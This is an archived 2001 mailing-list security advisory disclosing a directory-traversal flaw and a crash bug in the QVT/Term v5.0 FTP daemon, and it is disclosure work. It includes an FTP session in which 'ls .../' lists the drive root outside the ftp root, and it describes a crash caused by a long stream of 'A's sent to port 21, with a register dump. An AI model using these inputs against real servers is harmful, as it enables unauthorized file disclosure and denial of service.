Vulnerabilities in QVT/Term

From: joetestaat_private
Date: Tue Sep 25 2001 - 21:13:17 PDT

Next message: Alex S. Harasic: "3Com® HomeConnect® Cable Modem Denial of Service"

Previous message: bugzillaat_private: "[RHSA-2001:110-05] Insecure setserial initscript"
Next in thread: 3APA3A: "Re: Vulnerabilities in QVT/Term"
Reply: 3APA3A: "Re: Vulnerabilities in QVT/Term"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----

Vulnerabilities in QVT/Term




    Overview

QVT/Term v5.0 is a suite of Internet tools available from http://www.qpc.com/.  Two
vulnerabilities exist in the FTP daemon.  The first allows a remote user to list the files
outside the ftp root.  The second allows a remote user to crash the server.




    Details

The following excerpt demonstrates the file listing problem; an ftp root of 'C:\root\root\'
was used:


> ftp localhost
Connected to xxxxxxxxx.rh.rit.edu.
220 xxxxxxxxx FTP server (QVT/Net 4.3) ready.
User (xxxxxxxxx.rh.rit.edu:(none)): anonymous
331 Guest login OK, please send real ident as password.
Password:
230 Guest login OK, access restrictions apply.
ftp> ls ../
200 PORT command successful.
150 Opened data connection for 'ls' (xxxxxxxxx,1048) (0 bytes).
root
226 Transfer complete.
ftp: 6 bytes received in 0.05Seconds 0.12Kbytes/sec.
ftp> ls .../
     [file listing of C:\ is shown here]
226 Transfer complete.
ftp: 1192 bytes received in 0.11Seconds 10.84Kbytes/sec.
ftp>



The following is the crash dump that results when a remote user connects to port 21 and
sends a long stream of 'A's (~700+):



FTPD caused an invalid page fault in
module FTPD.EXE at 017f:00404b34.
Registers:
EAX=0000200a CS=017f EIP=00404b34 EFLGS=00010213
EBX=0066799b SS=0187 ESP=0064fac8 EBP=00666a58
ECX=0000066c DS=0187 ESI=00667ff3 FS=1bb7
EDX=006699a5 ES=0187 EDI=00669ffd GS=0000
Bytes at CS:EIP:
f3 a5 8b c8 68 70 fc 40 00 83 e1 03 53 f3 a4 8b
Stack dump:
00000004 00771b90 00666a58 0064fbc0
0000060a 12948ae8 00771b90 004105a0
00288b30 bff728a2 0187bff7 bff713e2
12948b04 0a2c175f 12990002 00288b4c




    Solution

No quick fix is possible.




    Vendor Status

QPC Software was contacted via <supportat_private> on Tuesday, September 18, 2001.  No reply
was received.






    - Joe Testa

e-mail:   joetestaat_private
web page: http://hogs.rit.edu/~joet/

AIM:      LordSpankatron


-----BEGIN PGP SIGNATURE-----
Version: Hush 2.0

wl0EARECAB0FAjuxgKkWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNAPK
AJ9wTSs45AV9UKruT/Hikdomqu0IWgCfbDSqFhwDBqLJYqKimvXMV20hPmc=
=xAvj
-----END PGP SIGNATURE-----

Next message: Alex S. Harasic: "3Com® HomeConnect® Cable Modem Denial of Service"
Previous message: bugzillaat_private: "[RHSA-2001:110-05] Insecure setserial initscript"
Next in thread: 3APA3A: "Re: Vulnerabilities in QVT/Term"
Reply: 3APA3A: "Re: Vulnerabilities in QVT/Term"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Sep 26 2001 - 10:15:22 PDT